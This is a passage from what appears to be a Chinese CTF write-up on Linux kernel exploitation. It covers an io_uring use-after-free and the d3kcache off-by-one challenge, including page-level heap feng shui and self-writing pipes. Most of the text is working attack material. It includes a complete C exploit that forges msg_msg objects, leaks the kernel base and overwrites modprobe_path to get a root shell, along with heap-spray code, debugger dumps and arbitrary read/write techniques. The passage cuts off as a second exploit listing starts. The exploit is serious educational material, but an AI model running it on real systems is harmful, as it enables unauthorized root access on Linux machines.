14:00a0│ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
  • 此时已经成功伪造了 io_buffer_list
1
2
3
4
5
0xffffffff8132fb6f <__io_uring_register+623>    call   __io_remove_buffers.isra.0           >
rdi: 0xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0xffffffff
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff8132fb64 (__io_uring_register+612) ◂— mov esi, 0xffffffff
1
2
3
4
5
0xffffffff81325ebe <__io_remove_buffers.isra.0+270>    call   kvfree            <kvfree>
rdi: 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0x0
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff81325eb8 (__io_remove_buffers.isra.0+264) ◂— mov rdi, qword ptr [rbx]
  • 这里将会释放 io_buffer_list 内部的内存区域,实现堆重叠

利用堆重叠可以覆盖位于 UAF msg_msg 下方的另一个 msg_msg,然后溢出读取这个 msg_msg 下方的 io_ring_ctx 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
tmp = (uint64_t*)msg->mtext; /* 申请到msg_msg+0x60,覆盖new msg_msg */
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死,不然会导致crash

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800; // 伪造循环链表节点
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
print_hex(io_ring_ctx, 0x200);

计算出内核基地址后,就可以考虑打 msg_msg unlink attack,往 modprobe_path 中写入自定义脚本的路径

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死不然会导致crash

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");
sleep(2);

if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

用同样的方法控制 msg_msg,不过这次的目的是修改 msg_msg.m_list

1
2
3
4
5
6
7
8
100:08000xffff888005bfd800 —▸ 0xffffffff82e51258 ◂— 0x0
101:08080xffff888005bfd808 ◂— 0x612f706d742f /* '/tmp/a' */
102:08100xffff888005bfd810 ◂— 0x1
103:08180xffff888005bfd818 ◂— 0xfd0
104:08200xffff888005bfd820 —▸ 0xffff888005bfd420 ◂— 0xffff888005bfd420
105:08280xffff888005bfd828 —▸ 0xffff888005bfd840 ◂— 0x6161616161616161 ('aaaaaaaa')
106:08300xffff888005bfd830 ◂— 0x6161616161616161 ('aaaaaaaa')
107:08380xffff888005bfd838 ◂— 0x6161616161616161 ('aaaaaaaa')

最后触发 msg_msg unlink attack 即可完成提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <linux/io_uring.h>
#include <stdatomic.h>

#include "kernelpwn.h"

#define MSG_QUEUE_NUM 0x10

#define PAGE_SIZE 0x1000
#define BUFFER_LEN (PAGE_SIZE * 8)
#define PBUF_BASE ((void*)0x1000)

#define IORING_REGISTER_PBUF_RING (22)
#define IORING_UNREGISTER_PBUF_RING (23)

#define IORING_OP_PROVIDE_BUFFERS (31)

//内存屏障宏
#define io_uring_smp_store_release(p, v) \
atomic_store_explicit((_Atomic typeof(*(p))*)(p), (v), \
memory_order_release)

#define io_uring_smp_load_acquire(p) \
atomic_load_explicit((_Atomic typeof(*(p))*)(p), \
memory_order_acquire)

struct io_uring_buf_reg {
__u64 ring_addr;
__u32 ring_entries;
__u16 bgid;
__u16 pad;
__u64 resv[3];
};

struct new_io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
};
__u64 __pad2[2];
};

int uring_fd;
char* buffer;
struct new_io_uring_sqe* sqes;
unsigned *sring_tail, *sring_mask, *sring_array, *cring_head;
int msgid[MSG_QUEUE_NUM];

void* worker(void* res)
{
msgrcv(msgid[0], res, PAGE_SIZE, (long)PBUF_BASE, 0);
puts("shouldn't get here");
}

void* do_mmap(void* base, size_t len)
{
int flags = MAP_ANONYMOUS | MAP_PRIVATE;
if (base)
flags |= MAP_FIXED;

void* res = mmap(base, len, PROT_READ | PROT_WRITE, flags, -1, 0);
if ((size_t)res == -1 || (base && (res != base))) {
err_exit("mmap");
exit(-1);
}
memset(res, '\x00', len);
return res;
}

int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
return (int)syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_register(unsigned int fd, unsigned int opcode,
void* arg, unsigned int nr_args)
{
return (int)syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int io_uring_enter(int ring_fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags)
{
return (int)syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete, flags, NULL, 0);
}

void submit_provide_buffer(void){
io_uring_smp_store_release(&sring_array[0], 0);

int tail = *sring_tail;
tail++;
io_uring_smp_store_release(sring_tail, tail);

int ret = io_uring_enter(uring_fd, 1, 1, IORING_ENTER_GETEVENTS);

int head = io_uring_smp_load_acquire(cring_head);
head++;
io_uring_smp_store_release(cring_head, head);
}

void init_io_uring(void){ /* kmalloc-2k */
struct io_uring_params p = {0};

uring_fd = io_uring_setup(0x1, &p);
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
int sqes_sz = p.sq_entries * sizeof(struct new_io_uring_sqe);

unsigned char* sq_ptr = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);

sring_tail = (unsigned int*)(sq_ptr + p.sq_off.tail);
sring_mask = (unsigned int*)(sq_ptr + p.sq_off.ring_mask);
sring_array = (unsigned int*)(sq_ptr + p.sq_off.array);

sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES); /* 提交队列项 */

unsigned char* cq_ptr = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);

cring_head = (unsigned int*)(cq_ptr + p.cq_off.head);

buffer = do_mmap(0, BUFFER_LEN);
if (buffer == NULL) {
err_exit("malloc buffer");
}
}

int do_free_first(void)
{
int ret;

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.ring_addr = 0xF00000000;
reg.ring_entries = 0x20000000;
reg.bgid = 0x0;

ret = io_uring_register(uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1);
return ret;
}

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 2048 - 320*2 = 1408
*/
char fake_secondary_msg[1408];

int main(int argc , char **argv, char **envp)
{
int ret;
int sk_sockets[SOCKET_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;

save_status();
unshare_setup();

init_io_uring();

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget((key_t)1234 + i, 0666 | IPC_CREAT | IPC_EXCL)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = (uint64_t)pbuf;
sqes->len = 0xFD0;
sqes->buf_group = 0;
submit_provide_buffer();

for (int i = 0; i < 0x2; i++) {
sqes->addr = (uint64_t)malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21;
submit_provide_buffer();
}

puts("submit_provide_buffer");

uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef){
}
//print_hex(buffer,0xf80);

uint64_t io_bl = *((uint64_t*)(buffer + 0x18)) - 0x420;
printf("io_bl = 0x%lx\n",io_bl);

msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0);

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p);

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0);

#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x40)] = io_bl + 0x60;
tmp[IDX(0x48)] = io_bl;
tmp[IDX(0x50)] = 0x10000;
tmp[IDX(0x60)] = io_bl + 0x68;
tmp[IDX(0x68)] = 0xdeadbeef;

tmp[IDX(0x80)] = io_bl + 0xa0;
tmp[IDX(0x88)] = io_bl;
tmp[IDX(0x90)] = 0x10000;
tmp[IDX(0xa0)] = io_bl + 0x1000;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0);

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
//print_hex(io_ring_ctx, 0x200);

kernel_offset = io_ring_ctx[0x420 / 8] - 0xffffffff810a8470;
kernel_base = kernel_offset + 0xffffffff81000000;
uint64_t modprobe_path = kernel_offset + 0xFFFFFFFF82E51260;

printf("io_ring_ctx->fallback_work: 0x%lx\n",io_ring_ctx[0x420 / 8]);
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);
printf("modprobe_path: 0x%lx\n",modprobe_path);

msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8;
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f;
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");

if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

sleep(2);
int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(fd, buffer, 0x10);
puts(buffer);
close(fd);

fd = open("/tmp/a", O_RDWR|O_CREAT);
char *script = "#!/bin/sh\nchmod 777 /flag\nsetsid cttyhack setuidgid 0 /bin/sh\n";
write(fd, script, strlen(script));
close(fd);
system("chmod 777 /tmp/a");

int ff = open("/tmp/asd", O_WRONLY | O_CREAT);
write(ff, "\xff\xff\xff\xff", 4);
close(ff);

system("chmod 777 /tmp/asd; /tmp/asd");
if(fork()==0)
system("/bin/sh");

puts("alive");
while (1)
;

return 0;
}

d3kcache

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-hda ./rootfs.img \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 root=/dev/sda rw rdinit=/sbin/init kaslr pti=on quiet oops=panic panic=1" \
-no-reboot \
-s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/sh
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
chown root:root /root/flag
chmod 600 /root/flag

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

insmod /root/d3kcache.ko
chmod 666 /dev/d3kcache

cat /root/banner
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

cd /home/ctf
setsid cttyhack su ctf -c /bin/sh
#setsid cttyhack setuidgid 1000 sh

poweroff -d 0 -f
  • dmesg_restrict
  • kptr_restrict
1
2
3
4
CONFIG_CFI_CLANG=y # 开启内存控制器(GFP_KERNEL和GFP_ACCOUNT之间存在隔离)
CONFIG_MEMCG=y # 开启Control-Flow Integrity控制流完整性(内核ROP失效)
CONFIG_SLAB_FREELIST_RANDOM=y # 开启slab freelist随机化
CONFIG_SLAB_FREELIST_HARDENED=y

漏洞分析

漏洞点如下:

1
2
3
4
5
if ( !copy_from_user(kdata, ptr, size) )
{
kdata[size] = 0; // 末尾置空,off-by-one
re = 0LL;
}
  • 内核 off-by-one

程序的 kmem_cache 是独立的:

1
2
3
4
5
6
7
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 2048LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
  • 只能考虑 cross-cache overflow

页级堆风水

页级堆风水即以内存页为粒度的内存排布方式,这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页
  • 释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页

接下来利用内核模块的 off-by-one 就可能溢出到其他的内核结构体上

可以使用如下方案来构建页级堆风水:

  • 创建一个 protocol 为 PF_PACKET 的 socket
  • 调用 setsockoptPACKET_VERSION 设为 TPACKET_V1 或者 TPACKET_V2
  • 调用 setsockopt 提交一个 PACKET_TX_RING

此时便存在如下调用链:

1
__sys_setsockopt() -> sock->ops->setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • 用以分配 tp_block_nr2^order 内存页(其中 ordertp_block_size 决定)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}
  • 直接调用 __get_free_pages() 向 buddy system 请求内存页,因此可以利用该函数进行大量的页面请求

自写管道

当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

1
2
3
4
5
6
7
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

自写管道的核心就是劫持 pipe_buffer->page,使该 page 结构体映射 pipe_buffer 本身所在的物理页面,通过多个这样的自写管道就可以构造出一个近乎无限制的任意读写系统

内核结构体 pipe_buffer 的第一个条目为 page,覆盖其低位就可能导致 page 重叠:

  • 覆盖低位后,pipe_buffer1-1->pagepipe_buffer1-2->page 指向同一个 page

1700041832088

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

1700043734977

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

  • 利用之前的 UAF 可以修改 pipe_buffer2-1->page,使 pipe_buffer2-1->pagepipe_buffer2-2->page 指向同一个 page,构成二级 UAF

1700044287875

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,并利用二级 UAF 覆盖 pipe_buffer3->pagepipe_buffer2->page

  • 由于 pipe_buffer2->page 映射 pipe_buffer3 所在的物理页面,现在 pipe_buffer3 成为 self-writing pipe

1700045029863

接着构造另外两个 self-writing pipe,直到将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • 这3个 self-writing pipe 在同一个页面上,并且它们的 pipe_buffer->page 都映射这个页面

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1self-writing pipe2,使得 self-writing pipe1 的 pipe 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

入侵思路

先利用 setsockopt 构建好页级堆风水

在准备阶段,分别在 socket_fd 中部署好大量 1K,2K,8K 的页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}
  • alloc_page 用于申请页面
  • free_page 用于释放页面

先释放高阶的页面,然后申请低阶的页面,在伙伴系统的分配下低阶页面大概率是物理连续的

利用这个方法部署连续的 pipe_buffer,然后在中间镶嵌一段内核模块申请的可控页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

触发 off-by-one,大概率会触发 cross-cache overflow 进而覆盖 pipe_buffer->page 的低位

此时两个 pipe_buffer->page 指向同一个 page,可以利用上述方法构造3个自写管道(详情见之前的博客)

构造完成后,调试信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
00:00000xffff888007267000 —▸ 0xffffea00001c9180 ◂— 0xfffffc0000000 
01:00080xffff888007267008 ◂— 0x24 /* '$' */
02:00100xffff888007267010 ◂— 0x0
03:00180xffff888007267018 ◂— 0x10
04:00200xffff888007267020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff888007267040 ◂— 0x0
... ↓ 7 skipped
10:00800xffff888007267080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880072670c0 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe1 */
19:00c8│ 0xffff8880072670c8 ◂— 0xb8000000c8
1a:00d0│ 0xffff8880072670d0 —▸ 0xffffffff82451b30 ◂— 0x0
1b:00d8│ 0xffff8880072670d8 ◂— 0x10
1c:00e00xffff8880072670e0 ◂— 0x0
1d:00e80xffff8880072670e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
20:01000xffff888007267100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
28:01400xffff888007267140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
30:01800xffff888007267180 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe2 */
31:01880xffff888007267188 ◂— 0x240
32:01900xffff888007267190 —▸ 0xffffffff82451b30 ◂— 0x0
33:01980xffff888007267198 ◂— 0x10
34:01a0│ 0xffff8880072671a0 ◂— 0x0
35:01a8│ 0xffff8880072671a8 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 2 skipped
38:01c0│ 0xffff8880072671c0 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
40:02000xffff888007267200 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
48:02400xffff888007267240 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe3 */
49:02480xffff888007267248 ◂— 0xe0000000c8
4a:02500xffff888007267250 —▸ 0xffffffff82451b30 ◂— 0x0
  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

构造好 RAA 与 WAA 原语后,便可以从后往前扫描内存,同时泄露 vmemmap_basekernel_base

进行任意读写之前,都需要先将物理地址转化为对应 paga 结构体的地址,转换函数如下:

1
2
3
4
5
6
7
8
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

从前往后扫描内存,查找并尝试覆盖 current_task->credinit_cred

  • 调试时可以通过解引用 task_struct->parent(offset=309*8) 的方式向上一直找到 init 进程(init->parent 指向自身,利用这一点可以定位 init 进程)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
